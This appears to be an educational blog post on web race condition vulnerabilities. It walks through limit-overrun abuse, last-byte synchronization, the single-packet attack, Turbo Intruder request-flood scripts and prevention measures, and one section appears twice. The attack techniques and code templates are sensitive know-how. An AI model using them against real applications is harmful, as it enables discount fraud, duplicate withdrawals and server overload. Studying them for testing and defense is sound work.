What is Race Condition
Imagine that you are planning to go to a movie at 5 pm. You inquire about the availability of the tickets at 4 pm. The representative says that they are available. You relax and reach the ticket window 30 minutes later, but then to your horror all the tickets get sold. The problem here was in the duration between the check and the action. You inquired at 4 and acted at 4:30. In the meantime, someone else grabbed the tickets. That's a race condition.
Technically speaking, Race condition occurs when multiple threads read and write the same variable i.e. they have access to some shared data and they try to change it at the same time. In such a scenario threads are “racing” each other to access/change the data. This is a major security vulnerability where an attacker can extract sensitive information by exploiting the race window.
In this blog we will be talking about race condition vulnerabilities in various web scenarios. Lessgoo
Limit Overrun race conditions
its the most well known type of race condition which enable you to exceed any limit imposed by the business logic of the example. Lets take an example so that things can become more clear.
Consider an online store that lets you enter a promotional code during checkout to get a one-time discount on your order.
To apply this discount, the application may perform the following high-level steps:
- Check that you haven't already used this code.
- Apply the discount to the order total.
- Update the record in the database to reflect the fact that you've now used this code.
If you later attempt to reuse this code, the initial checks performed at the start of the process should prevent you from doing this
Now consider what would happen if a user who has never applied this discount code before tried to apply it twice at almost exactly the same time:
As you can see, the application transitions through a temporary sub-state; that is, a state that it enters and then exits again before request processing is complete. In this case, the sub-state begins when the server starts processing the first request, and ends when it updates the database to indicate that you've already used this code. This introduces a small race window during which you can repeatedly claim the discount as many times as you like. So by sending two parallel request at the same time we can exploit the race window and apply the discount code twice. Now imagine sending more than 2 of these parallel requests. The discounted code will get added up and ultimately you can buy the product at a very cheap price.
The primary challenge is timing the requests so that at least two race windows line up, causing a collision. This window is often just milliseconds and can be even shorter.
Detecting and Exploiting Limit Overrun Race Conditions with Burp Suite
Race condition vulnerabilities, particularly those involving business logic bypasses like limit overruns, are notoriously difficult to exploit reliably. The primary challenge lies in the extremely narrow timing window, often just a few milliseconds, during which two or more concurrent requests must be executed in near-perfect synchronization. Traditionally, this has required either precise scripting or specialized tools with limited visibility and flexibility.
However, recent advancements in Burp Suite’s Repeater tool—particularly the updates introduced in version 2023.9—have significantly improved a pentester's ability to detect and exploit race conditions with high precision.
Introducing Parallel Request Support in Burp Repeater
Burp Repeater has historically been used for sending individual HTTP requests and analyzing responses. While invaluable for manual testing, it was previously limited in scenarios where concurrent request timing was critical.
With the 2023.9 update, Burp Repeater introduced parallel request execution, allowing testers to send multiple, carefully crafted requests simultaneously. This functionality dramatically enhances the ability to exploit vulnerabilities that depend on precise timing, such as race conditions.
Understanding the Role of Network Jitter
Network jitter refers to the variability in packet delay across a network. Even a high-speed connection can suffer from inconsistent delivery times, which significantly affects any exploit that depends on synchronized timing. In the context of race condition testing, jitter introduces unpredictability—causing well-timed requests to miss the race window entirely.
To address this, Burp Suite introduced two protocol-specific synchronization strategies aimed at minimizing the impact of jitter.
Exploiting Race Conditions over HTTP/1: The Last-Byte Synchronization Technique
When testing a target that communicates over the HTTP/1 protocol, Burp Repeater leverages a technique known as last-byte synchronization.
In this method:
- Multiple requests are prepared and transmitted up to the final byte.
- These partially sent requests are held in a queued state by the tool.
- At the precise moment, the final byte of each request is released simultaneously.
This ensures that all requests hit the server at the same time, entering the same race window and maximizing the chance of triggering a vulnerability. The technique effectively removes jitter from the equation during the critical portion of the request transmission.
Exploiting Race Conditions over HTTP/2: The Single-Packet Attack
In environments where the target application supports HTTP/2, Burp Suite employs a more sophisticated approach known as the Single-Packet Attack, which was first introduced at Black Hat 2023 by PortSwigger researchers.
This technique involves:
- Crafting multiple complete HTTP/2 requests.
- Combining them into a single TCP packet.
- Transmitting that single packet so that all embedded requests are processed by the server simultaneously.
The benefit of this method is that it eliminates the risk of jitter entirely, as the server receives and processes all requests within the same network operation. It is particularly effective against modern web applications with asynchronous or multi-threaded backend processing, where subtle timing mismatches can otherwise prevent successful exploitation.
Implications for Limit Overrun Exploits
When attempting to exploit limit overrun vulnerabilities, the ability to synchronize requests at a granular level is critical. Whether you're:
- Applying the same discount code multiple times
- Triggering concurrent withdrawals in a fintech application
- Circumventing resource allocation limits
these new techniques in Burp Suite significantly improve the likelihood of a successful exploit.
By utilizing either last-byte synchronization (HTTP/1) or the single-packet attack (HTTP/2), penetration testers can reliably enter the temporary sub-states that make race condition exploits possible.
Why send so many requests?
You may think that race conditions can be easily exploited by 2 requests so why send 20-30 parallel requests at the same time. The reasons for this are-
It overcomes server-side delays (aka internal latency or server-side jitter)
It increases your chances of hitting the vulnerable timing
Great during the recon/discovery phase when you’re probing behavior and testing the race condition vulnerability
basically the more requests you send the more your chances increase of hitting the sweet spot
Let's take our previous example where we try to redeem coupons at the same time and and exploit the race condition
Normally, jitter might cause one request to arrive too early or too late
With Burp's new techniques, you can flood the server with 30 simultaneous coupon redeems
If the timing is right, the coupon might be used multiple times and then your vulnerability would be confirmed
Turbo Intruder – The Fast Lane for Race Condition Attacks
Turbo Intruder is a powerful Burp Suite extension designed for lightning-fast, customizable HTTP request attacks. Unlike the default Intruder tool, Turbo Intruder uses asynchronous I/O and optimized threading to send thousands of requests per second, making it ideal for testing race conditions, brute-force attacks, token fuzzing, and more.
Key Features:
- Blazing Speed: Far faster than Burp’s built-in Intruder, even in the Community Edition.
- Python Scripting: Full control over request generation and response handling using Jython.
- Asynchronous Engine: Efficiently handles massive concurrent connections.
- Versatile Use Cases: Race conditions, login brute-forcing, JWT tampering, SSRF detection, HTTP desync attacks, and more.
How to Use:
- Install from Burp's BApp Store.
- Right-click any request → Send to Turbo Intruder.
- Customize the pre-built Python script to define payloads, logic, and filtering.
Example Use Case:
Detecting a race condition by sending 100 concurrent password reset requests in parallel.
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=20,
requestsPerConnection=100,
pipeline=False)
for i in range(100):
engine.queue(target.req, gate='race')
def handleResponse(req, interesting):
if 'Success' in req.response:
print('Race condition triggered!')
Note:
Use responsibly — Turbo Intruder can overwhelm or crash servers if misused. Always test within a legal scope.
Using Turbo Intruder to Detect Race Condition Overruns
Detecting Race Conditions with Single-Packet Attacks
To detect overrun vulnerabilities caused by race conditions, Turbo Intruder supports a technique known as the single-packet attack. This method involves grouping requests and sending them simultaneously within a single TCP packet, assuming the server supports HTTP/2.
Setup Instructions
Ensure the target application supports HTTP/2, as the single-packet attack is not compatible with HTTP/1.
Configure the request engine to use the HTTP/2 backend with one concurrent connection:
engine = RequestEngine(
endpoint=target.endpoint,
concurrentConnections=1,
engine=Engine.BURP2
)
- Queue multiple requests using a gate label. For example, queue 20 requests under gate
'1'
:
for i in range(20):
engine.queue(target.req, gate='1')
- Once queued, release all requests in the gate at once:
engine.openGate('1')
This structure ensures that all 20 requests are sent in parallel within the same TCP packet, increasing the likelihood of triggering a race condition if one exists.
Single endpoint race condition
Sending parallel requests to a single endpoint can be really important in some cases, for example consider a password reset mechanism that stores the user ID and reset token in the user's session.
In this scenario, sending two parallel password reset requests from the same session, but with two different usernames, could potentially cause the collision in password reset mechanism
Methodology to follow to exploit race conditions
1. Predict potential collisions
Testing every endpoint is impractical. After mapping out the target site as normal, you can reduce the number of endpoints that you need to test by asking yourself the following questions:
Is this endpoint security critical? Many endpoints don't touch critical functionality, so they're not worth testing.
Is there any collision potential? For a successful collision, you typically need two or more requests that trigger operations on the same record.
2. Probe for clues(Race condition testing)
First, understand how the endpoint behaves normally by sending a group of requests one after another in sequence using Burp Repeater. This gives you a baseline.
Next, send the same group of requests all at once (in parallel) to simulate a race condition. This reduces network delay and may trigger unexpected behavior. Use "Send group in parallel" in Burp Repeater or Turbo Intruder for faster, more aggressive testing.
Watch for any differences in responses or app behavior — even small changes like different emails or weird UI behavior. These deviations are clues that a race condition may exist.
3. Prove the concept
Try to understand what's happening, remove superfluous requests, and make sure you can still replicate the effects.
Advanced race conditions can cause unusual and unique primitives, so the path to maximum impact isn't always immediately obvious. It may help to think of each race condition as a structural weakness rather than an isolated vulnerability.
Multi endpoint race conditions
We can also send requests to multiple endpoints at the same time. think about the classic logic flaw in online stores where you add an item to your basket or cart, pay for it, then add more items to the cart before force-browsing to the order confirmation page.
Understanding Multi-Endpoint Race Conditions: Problems and Workarounds
When exploiting race conditions, attackers often target a single vulnerable endpoint. However, when a race condition spans multiple endpoints, synchronizing requests becomes significantly more complex. Even if requests are sent simultaneously, they may not reach or be processed by the server at the same time due to various timing discrepancies.
Why Multi-Endpoint Race Conditions Are Challenging
Network Delays
Network delays can stem from client-to-server communication overhead, front-end processing, or the nature of the HTTP protocol itself:
- HTTP/1.1: Opens a new TCP connection for each request unless Keep-Alive is explicitly enabled.
- HTTP/2: Uses multiplexing over a single connection, reducing connection-related delays.
These delays usually affect all requests uniformly, so even if there’s a delay, the relative timing between requests may still remain intact.
If only the first request is slower but the rest arrive close together, it’s likely a connection-related delay. This can often be ignored.
Endpoint-Specific Delays
Some endpoints take longer to process than others due to:
- Complex business logic
- Heavy database operations
- Additional validation steps
These delays impact only the affected endpoints, disrupting synchronization across requests.
If response times remain inconsistent across multiple requests, even after warming up connections, this indicates endpoint-specific delays that need to be accounted for.
Workarounds for Synchronizing Requests
To deal with inconsistencies and improve synchronization, consider the following techniques:
1. Adjust Request Timing Manually
Manually shift the timing of your requests. For example, send requests to slower endpoints slightly earlier to compensate for the processing time difference.
2. Use Connection Reuse or HTTP/2
Reducing connection overhead helps requests arrive more predictably:
- Reuse TCP connections using the Keep-Alive header.
- Prefer HTTP/2, which allows multiple requests to be sent simultaneously over a single connection.
3. Pad Faster Endpoints
If some endpoints consistently respond faster, slow them down intentionally to align with slower ones:
- Add delays (e.g., using
sleep()
functions, if supported) - Increase payload size to artificially extend processing time
4. Use Turbo Intruder for Fine-Grained Timing Control
Turbo Intruder is highly effective for controlling request timing at the byte level. You can:
- Send warm-up requests to prepare the backend and eliminate one-time delays
- Precisely schedule real attack requests to align with specific processing windows
This allows you to fine-tune request dispatch with minimal network interference.
Additional Tips
- Run multiple iterations to measure and understand timing differences across endpoints.
- Ensure all endpoints use the same session or authentication context, if required.
- Test under consistent conditions to isolate variability in response timing.
Understanding Multi-Endpoint Race Conditions: Problems and Workarounds
When exploiting race conditions, attackers often target a single vulnerable endpoint. However, when a race condition spans multiple endpoints, synchronizing requests becomes significantly more complex. Even if requests are sent simultaneously, they may not reach or be processed by the server at the same time due to various timing discrepancies.
Why Multi-Endpoint Race Conditions Are Challenging
Network Delays
Network delays can stem from client-to-server communication overhead, front-end processing, or the nature of the HTTP protocol itself:
- HTTP/1.1: Opens a new TCP connection for each request unless Keep-Alive is explicitly enabled.
- HTTP/2: Uses multiplexing over a single connection, reducing connection-related delays.
These delays usually affect all requests uniformly, so even if there’s a delay, the relative timing between requests may still remain intact.
If only the first request is slower but the rest arrive close together, it’s likely a connection-related delay. This can often be ignored.
Endpoint-Specific Delays
Some endpoints take longer to process than others due to:
- Complex business logic
- Heavy database operations
- Additional validation steps
These delays impact only the affected endpoints, disrupting synchronization across requests.
If response times remain inconsistent across multiple requests, even after warming up connections, this indicates endpoint-specific delays that need to be accounted for.
Workarounds for Synchronizing Requests
To deal with inconsistencies and improve synchronization, consider the following techniques:
1. Adjust Request Timing Manually
Manually shift the timing of your requests. For example, send requests to slower endpoints slightly earlier to compensate for the processing time difference.
2. Use Connection Reuse or HTTP/2
Reducing connection overhead helps requests arrive more predictably:
- Reuse TCP connections using the Keep-Alive header.
- Prefer HTTP/2, which allows multiple requests to be sent simultaneously over a single connection.
3. Pad Faster Endpoints
If some endpoints consistently respond faster, slow them down intentionally to align with slower ones:
- Add delays (e.g., using
sleep()
functions, if supported) - Increase payload size to artificially extend processing time
4. Use Turbo Intruder for Fine-Grained Timing Control
Turbo Intruder is highly effective for controlling request timing at the byte level. You can:
- Send warm-up requests to prepare the backend and eliminate one-time delays
- Precisely schedule real attack requests to align with specific processing windows
This allows you to fine-tune request dispatch with minimal network interference.
Abusing rate or resource limits for race conditions-
If connection warming doesn' t synchronize your race condition attack, try the following methods
Client-Side Delay (Turbo Intruder)
- Turbo Intruder lets you add a short delay before sending each request.
- Problem: This splits the request over multiple TCP packets, so you can't use single-packet attacks.
- Not reliable on high-jitter targets (where network timing is unpredictable).
Triggering Server-Side Delay (Smart Bypass)
- Abuse rate-limiting: Send many dummy requests quickly to the server.
- This forces the server to slow down processing (common anti-abuse feature).
- Now send your real attack request during that slowdown.
- Helps make single-packet race condition attacks work even if delay is needed.
How to Prevent Race Condition Vulnerabilities
Race conditions occur when two or more operations execute simultaneously and cause unexpected or harmful behavior. Here are practical techniques to prevent them in your applications:
1. Avoid Mixing Different Data Sources
- Don’t combine data from different sources (e.g., database and cache) when making critical decisions.
- Always rely on a single, trusted source—typically your main database—for sensitive operations like authentication, payments, or order validation.
2. Make Critical Actions Atomic
- Wrap multi-step processes inside a single transaction to prevent interference between steps.
-
For example, when placing an order:
- Validate the cart total
- Process the payment
- Save the order
- All of this should happen in one atomic transaction.
3. Use Built-in Database Protections
-
Enforce constraints to maintain data integrity:
- Unique constraints (e.g., on username or email)
- Foreign key constraints to prevent orphan records
These automatically prevent many race condition scenarios by rejecting invalid or duplicate data at the database level.
4. Don’t Rely on Sessions to Protect Database Logic
- Sessions should be used for tracking user identity, not for controlling the number of allowed operations.
-
Use server-side protections instead:
- Database-level row limits
- Application-layer rate limiting
- Request locking or queuing where needed
5. Keep Session State Consistent
- When modifying session-related data, update all changes in a single step.
- Use transactions to prevent partially updated or corrupted session data.
- Frameworks and ORMs like Django or Hibernate support transactional session handling—make use of them.
6. Carefully Consider Stateless Designs (JWT)
- Moving state to the client using JSON Web Tokens (JWT) can reduce server-side race conditions.
-
But if you go stateless, ensure JWTs are:
- Securely signed
- Untampered (with signature verification on every request)
- Short-lived or revocable to prevent replay or misuse
Conclusion
Race condition vulnerabilities are subtle but powerful attack vectors that often slip past traditional security checks. When dealing with multi-endpoint workflows or high-concurrency systems, even minor timing flaws can lead to severe data inconsistencies, privilege escalations, or unauthorized actions.
By understanding how these vulnerabilities arise—and implementing preventative strategies like atomic transactions, database constraints, and proper session handling—you can significantly reduce the risk. Tools like Turbo Intruder can help uncover these flaws during testing, but real security comes from designing systems that are resilient by default.
Race conditions are not just bugs; they’re symptoms of deeper architectural oversights. Fix the timing, structure the logic, and secure the flow—because attackers will race you to production.
Thanks for reading my blog on race conditions, this blog was inspired by the portswigger labs on race condition which gave hands on practical demo in addition to the techniques. All of which I have tried to simplified and provided them in this blog
.
Top comments (0)